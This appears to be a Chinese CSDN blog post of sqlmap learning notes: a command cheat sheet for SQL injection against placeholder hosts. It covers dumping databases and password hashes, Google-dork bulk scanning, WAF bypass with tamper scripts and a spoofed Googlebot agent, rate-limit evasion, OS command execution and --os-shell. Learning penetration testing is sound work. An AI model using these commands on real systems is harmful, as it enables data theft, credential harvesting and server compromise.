sqlmap学习笔记(一)

最新推荐文章于 2024-05-30 17:07:52 发布
最新推荐文章于 2024-05-30 17:07:52 发布
阅读量5.8k 收藏
点赞数
分类专栏: web渗透测试心得
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/108749513
版权

sqlmap学习笔记(一)

sqlmap 常用命令

1.sqlmap -u "www.xxx.com/news.asp?id=1"		//检查注入点
2.sqlmap -u "www.xxx.com/news.asp?id=1" --current-user	//获取当前用户名
3.sqlmap -u "www.xxx.com/news.asp?id=1" --current-db	//获取当前数据库名
4.sqlmap -u "www.xxx.com/news.asp?id=1" --dbs		//列数据库
5.sqlmap -u "www.xxx.com/news.asp?id=1" --privileges	//当前用户权限判断
6.sqlmap -u "www.xxx.com/news.asp?id=1" --users		//枚举用户
7.sqlmap -u "www.xxx.com/news.asp?id=1" --passwords		//枚举用户哈希
8.sqlmap -u "www.xxx.com/news.asp?id=1" --tables -D "admin"	//查admin库中的表名,得到user表
9.sqlmap -u "www.xxx.com/news.asp?id=1" --columns -T "user" -D "admin"	//查字段,得到id,username,password
10.sqlmap -u "www.xxx.com/news.asp?id=1" --dump -C "id,username,password" -T "user" -D "admin" -v 5	//拖库,或者使用--dump-all
11.--dbms "Mysql"		//指定数据库类型
12.--passwords -U root	//查指定列数据库用户root的密码
13.--level 5		//执行测试的等级,默认为1,2会进行cookie注入检测,3会进行useragent检测
14.--user-agent "Googlebot/2.1"
15.--tamper "space2morehash.py"
16.-v 0~6			//-v参数可查看payload,-v 3可显示注入的payload,4、5、6还可以显示HTTP请求,HTTP响应头和页面
17.--sql-shell		//提供交互式的sql查询界面
以上为常用sqlmap命令,其他的请查阅手册。

sqlmap 借助google批量扫注入点

1.sqlmap -g "site:target.com inurl:asp"	
2.如果要查询注入选y,跳过选n

注:大部分查询结果不存在注入

**sqlmap 利用tamper脚本编码绕过WAF

通过不同编码,绕过WAF
1.sqlmap -u "www.xxx.com/news.asp?id=1" --dbs --tamper "space2morehash.py"	//利用.py脚本改变编码,除了space2hash.py,还有base64encode.py、charencode.py等等,可查/usr/share/sqlmap/tamper
2.sqlmap.py --proxy http://127.0.0.1:8087 -u "www.xxx.com/news.asp?id=1" -v 3 –dbms “MySQL” --tamper "space2morehash.py" --referer "http://www.google.com" --user-agent "Googlebot/2.1"  //模拟google爬虫

sqlmap post注入

方法一:结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。
1.浏览器打开目标地址 http://www.testfire.net/bank/login.aspx
2.配置burp代理(127.0.0.1:8080)以拦截请求
3.点击login表单的submit按钮
4.这时候Burp会拦截到了我们的登录POST请求
5.把这个post请求复制为txt, 我这命名为test.txt 然后把它放至root目录下
6.运行sqlmap并使用如下命令:sqlmap -r /root/test.txt -p uid,这里参数 -r 是让sqlmap加载我们的post请求test.txt,而 -p 为指定注入用的参数。

方法二:指定参数post注入
1.sqlmap -u "http://www.test.net/test/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"

sqlmap cookies注入

1.sqlmap -u "www.xxx.com/news.asp" --cookie "id=1" --current-db
2.sqlmap -u "www.xxx.com/news.asp" --cookie "id=1" --tables -D "admin"  

注:注入时有可能存在连接线程数限制,线程设置不要太大

sqlmap 执行shell命令

在数据库权限足够大的时候,可以使用cmd命令:
1.sqlmap -u "www.xxx.com/news.asp?id=1" --os-cmd=ipconfig	//执行ipconfig命令
2.选取该web的脚本种类,此时为asp,选1
3.指定网站的根目录路径,如:d:\www\

获得一个shell
1.sqlmap -u "www.xxx.com/news.asp?id=1" --os-shell
2.选取该web的脚本种类,此时为asp,选1
3.指定网站的根目录路径,如:d:\www\
4.此时可以执行命令,并会在d:\www\下生成两个临时文件(tmpbxbxz.php/tmpuoiuz.php)

sqlmap 伪静态注入

伪静态页面网址:www.xxx.com/index.php/Index/view/id/40.html 
1.sqlmap -u "www.xxx.com/index.php/Index/view/id/40*.html" --dbs	//在存在注入的地方加入*键
2.sqlmap -u "www.xxx.com/index.php/Index/view/id/40*.html" --tables -D "admin"

sqlmap 延迟注入

某些网站有防注入保护,短时间内如果请求次数较多或短时间内请求错误页面次数较多都可能被网站屏蔽
1.sqlmap -u "www.xxx.com/index.php/Index/view/id/40*.html" --dbs --delay 5	//间隔5秒请求一次
2.--safe-url		//详细说明请查阅手册
3.--safe-freq		//详细说明请查阅手册

sqlmap 探测waf

sqlmap用来探测WAF类型
sqlmap -u “http://www.testfire.net/bank/login.aspx” --identify-waf
tempulcc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nginx对于XXX.com和XXX.com/index给映射到www.xxx.com的方式
fhb19870610的专栏
05-15 37万+
location / {             root    C:/website;             index   index.html index.htm index.php;             include C:/website/.htaccess; if ($host !~ "www.xincanzs.com") { rewrite
xxx.com和www.xxx.com的区别
热门推荐
weixin_42613703的博客
12-22 74万+
XXX.com 是主域名! WWW.xxx.com 一般是域名的主页! 在很多情况下,会配置成一样!!! 也有可能,主域名不配置到具体的IP,可能无法解析。。 C:\Windows\system32>nslookup baidu.com 服务器: UnKnown Address: 61.128.114.133 非权威应答: 名称: baidu.com Addresses: 22...
Fatal error: require(): Failed opening required ‘/www/wwwroot/xxxxxx/public/../thinkphp/start.php
最新发布
u010895694的博客
05-30 760
2、进入/www/server/nginx/conf目录下,找到fastcgi.conf,修改其中的一个参数’fastcgi_param PHP_ADMIN_VALUE’,没有的话可以自己加一个,/www/wwwroot是你的项目路径,每个人可能都不一样。起初看英文提示,以为是文件缺少,随后找了一下,发现文件都是在的。发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/172110.html原文链接:https://javaforall.cn。两种方法任选其一即可。
在网址上输入www.xxx.com到返回界面给用户发生了什么?
weixin_51287642的博客
08-06 26万+
在网址上输入www.xxx.com到返回界面给用户发生了什么? DNS域名解析(https://blog.csdn.net/yanshuanche3765/article/details/82589210)–>tcp三次握手建立连接(https://blog.csdn.net/xy010902100449/article/details/48274635)–>向服务器发送http请求,请求html文件–>服务器返回一个html文件–>tcp四次握手释放连接–>游览器解释html
ping: www.xxx.com: 未知的名称或服务
JolyouLu的博客
05-02 8万+
ping: www.xxx.com: 未知的名称或服务 在使用虚拟机时,若遇到ping: www.xxx.com: 未知的名称或服务,通常都是因为DNS为配置导致的 编辑网卡参数 执行如下命令 #进入到liunx网络配置的目录 cd /etc/sysconfig/network-scripts #编辑网卡参数 vim ifcfg-ens33 注意:编辑网卡时要注意,每个人网卡名称不一样的,我的网卡是ifcfg-ens33进入你们自己相应的网卡即可 添加DNS 进入之后添加dns服务器,8.8.8.
xxx.com跳到www.xxx.com的处理(301重定向)
maorenqi101的专栏
07-17 9万+
方法就是,在根目录 下添加 .htaccess,里面添加如下代码: RewriteEngine On RewriteCond %{http_host} ^XXX.com [NC] RewriteRule ^(.*)$ http://www.XXX.com/$1 [R=301.L]
SQLMAP使用笔记全集
05-20
收录了SQLmap使用笔记,使用方法,以及讲解实例,是学习使用sqlmap应用工具的好材料
ibatis 学习笔记
12-03
<sqlMap resource="User.xml"/> ``` `User.xml`是具体的SQL Map文件,其中定义了与用户相关的SQL语句映射。 总的来说,iBATIS以其简单易用和灵活性著称,允许开发者编写自定义SQL,同时提供数据访问的抽象层,使得...
ibatis学习笔记
06-03
在提供的学习笔记中,主要涉及了iBatis配置文件`sql-map-config.xml`、SQL映射文件`Employee.xml`以及一个简单的Java Pojo类`Employee.java`。以下是对这些内容的详细解释: 1. **`sql-map-config.xml`配置文件**:...
SQLMAP系列课程视频.rar
11-13
这个"SQLMAP系列课程视频.txt"可能是课程的目录或笔记,包含每一课的主题概要,帮助学习者跟踪进度和回顾关键点。通过深入学习这个课程,你可以掌握SQLMAP的强大功能,同时提高对Web安全的理解,这对于网络安全专业...
iBatis学习笔记
04-05
这里定义了使用JDBC作为事务管理器,以及一个简单的数据源,通过`${}`占位符引用外部属性文件`SqlMap.properties`中的属性值。 #### SqlMap.properties 这个文件包含了数据库连接的详细信息,例如: ```...
Spring技术内幕 学习笔记
08-10
标题中的“Spring技术内幕 学习笔记”表明这是一份关于深入理解Spring框架核心机制的资料集合,主要关注Spring框架的内部工作原理和高级用法。描述中的“NULL”没有提供额外信息,但我们可以通过标签“源码”和...
iBatis2学习笔记
02-08
4.iBatis2学习笔记SqlMap的配置总结(18条).doc 5.iBatis2学习笔记:入参和返回值的问题.doc 6.iBatis2学习笔记:一对多映射(双向).doc 7.iBatis2学习笔记:多对多映射(双向) .doc 8.iBatis2学习笔记:总结与...
网络安全-渗透完整笔记
03-27
Sqlmap是一款强大的SQL注入自动化工具,用于测试数据库安全。在渗透过程中,可能会遇到需要溯源的情况,这时会用到如the-backdoor-factory等工具来创建后门。此外,msfvenom是Metasploit框架中用于生成各种类型...
ibatis教程学习笔记
04-26
### ibatis教程学习笔记 #### 一、ibatis简介与特点 ibatis 是一个基于 Java 的持久层框架,它提供了一种将 SQL 映射到 Java 对象的方式,简化了 JDBC 的复杂操作。ibatis 通过 XML 配置文件或者注解的形式来描述 ...
ibatis笔记
04-19
《Ibatis笔记》 在深入探讨Ibatis之前,先简单介绍一下Ibatis,它是一个轻量级的Java持久层框架,由Clinton Begin创建,最初命名为iBATIS,后被Apache基金会接纳并更名为Apache MyBatis。它不同于ORM框架如...
nginx 不带www到www域名的重定向
Saindy5828的专栏
09-01 2万+
nginx 不带www到www域名的重定向 这里,如果是单次重定向用 redirect, 如果永久跳转用 permanent,这里用 permanent  {                listen       80;                server_name  xxx.com www.xxx.com;                index index.html
访问www首页不跳转三级域名的三种方式 (struts welcome-file-list index.action问题)
saife的专栏
01-19 18万+
问题: 在工程发布的时候,首页访问一般都是www.xxx.com,如果首页没有动态action数据那么没有什么问题;如果是action请求数据,则可能遇到访问不到内容的情况,比方: 1.访问www.xxx.com 无法访问 2.访问www.xxx.com 做跳转,url跳转到了www.xxx.com/index.html(或者其他的什么),可以访问到了,但是据说会影响网站的权重,至少不美观。...
www2什么意思? HTTP与HTTPS的区别
ytakcc的专栏
07-17 16万+
www1、www2、、、什么意思:      www.xxx.xxx中的www一般是主服务器的地址,但是在服务器中,但是满足不了有的大网站的流量需求,最好的解决方法就是分流,就是再建新的服务器,而这个www1和www2是分流服务器的地址,也称为镜像服务器地址,可以用这个指向多个服务器IP! 这是服务器端的设定,你改没用的。 www1是站点主机名,可以随便起www1、www250、abc都可以。xx...
C#使用mybatis学习笔记
06-08
MyBatis是一个开源的持久化框架,可以帮助我们将数据从数据库中读取出来,然后转换为Java对象,并将Java对象写入数据库中。 在C#中使用MyBatis,需要先安装MyBatis.Net库,然后在项目中引用该库。接着,我们需要创建一个配置文件,用于配置MyBatis的数据库连接信息、SQL语句等。在配置文件中,我们需要指定一个别名,用于在程序中引用这个配置文件。 接下来,我们需要创建一个映射文件,用于将数据库中的数据映射为Java对象。在映射文件中,我们需要定义一个 resultMap,用于定义Java对象与数据库表之间的关系。我们还需要定义一个 SQL 语句,用于从数据库中读取数据,并将其转换为Java对象。 在程序中,我们需要创建一个 SqlSession 对象,用于执行SQL语句。我们可以通过SqlSession对象调用selectOne、selectList、update、delete等方法,来执行SQL语句,并将结果转换为Java对象或者操作数据库。 下面是一个简单的示例,展示了如何在C#中使用MyBatis: 1. 安装MyBatis.Net库 在Visual Studio中,选择“工具”-“NuGet包管理器”-“程序包管理器控制台”,然后输入以下命令: ``` Install-Package MyBatisNet ``` 2. 创建配置文件 在项目中创建一个名为“SqlMapConfig.xml”的文件,用于配置数据库连接信息、SQL语句等。以下是一个示例配置文件: ``` xml <?xml version="1.0" encoding="utf-8" ?> <sqlMapConfig> <database> <provider name="SqlServer" connectionString="Data Source=localhost;Initial Catalog=mydatabase;User ID=myuser;Password=mypassword;" /> </database> <sqlMap> <map resource="MyMapper.xml"/> </sqlMap> </sqlMapConfig> ``` 其中,provider元素用于指定数据库类型和连接字符串,map元素用于指定映射文件路径。 3. 创建映射文件 在项目中创建一个名为“MyMapper.xml”的文件,用于将数据库中的数据映射为Java对象。以下是一个示例映射文件: ``` xml <?xml version="1.0" encoding="utf-8" ?> <sqlMap namespace="MyMapper"> <resultMap id="MyResultMap" class="MyClass"> <result property="id" column="id"/> <result property="name" column="name"/> </resultMap> <select id="selectById" resultMap="MyResultMap"> SELECT * FROM mytable WHERE id=#id# </select> </sqlMap> ``` 其中,resultMap元素用于定义Java对象与数据库表之间的关系,select元素用于定义SQL语句。 4. 在程序中使用MyBatis 在程序中,我们需要创建一个 SqlSession 对象,用于执行SQL语句。以下是一个示例代码: ``` csharp using IBatisNet.DataMapper; using IBatisNet.DataMapper.Configuration; using IBatisNet.DataMapper.Configuration.Files; // 创建配置文件 DomSqlMapBuilder builder = new DomSqlMapBuilder(); ISqlMapper sqlMapper = builder.Configure(@"SqlMapConfig.xml"); // 执行SQL语句 MyClass obj = sqlMapper.QueryForObject<MyClass>("MyMapper.selectById", new { id = 1 }); ``` 以上是一个简单的示例,展示了如何在C#中使用MyBatis。实际上,MyBatis还有很多其他的用法和功能,需要我们在实际开发中去探索和使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值